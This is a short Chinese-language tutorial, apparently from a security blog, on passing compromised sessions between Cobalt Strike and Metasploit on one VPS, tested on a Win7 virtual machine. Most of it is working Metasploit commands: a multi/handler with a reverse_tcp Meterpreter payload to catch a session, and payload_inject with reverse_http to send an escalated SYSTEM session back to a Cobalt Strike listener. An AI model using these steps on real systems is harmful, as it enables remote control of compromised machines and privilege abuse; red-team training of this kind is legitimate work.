实验环境
cs4.4(4.5版本不知道为啥实现不了)
cs服务器与msf在同一台vps上
本地win7虚拟机
cs派生会话给msf
首先cs正常上线win7,这就不多说了,然后说如何将会话派生给msf
cs准备
选择Foreign,这里可以选HTTP,也可以选HTTPS,host写msf主机ip,我这里就写vps的公网ip,端口随意,不要被占用即可
msf准备
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost x.x.x.x #vps ip地址
set lport 2333 #端口和cs Foreign相同
exploit会话传递
然后选择刚刚建立的监听器Foreign HTTP,选择后就会看到msf接收到会话了
msf派生会话给cs
msf先正常上线win7主机,我这里用刚刚cs派生过来的会话,提权后再派生给cs
cs准备
能正常使用的监听器,我这里cs和msf都在一个服务器上,所以都是vps的ip
会话传递
这里我把提权后的会话返回给cs
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost x.x.x.x # CS服务端IP
set lport 1234 # CS服务端监听器的端口
set DisablePayloadHandler True
set PrependMigrate True
set session 2 # 会话id
run
可以看到成功返回了system会话
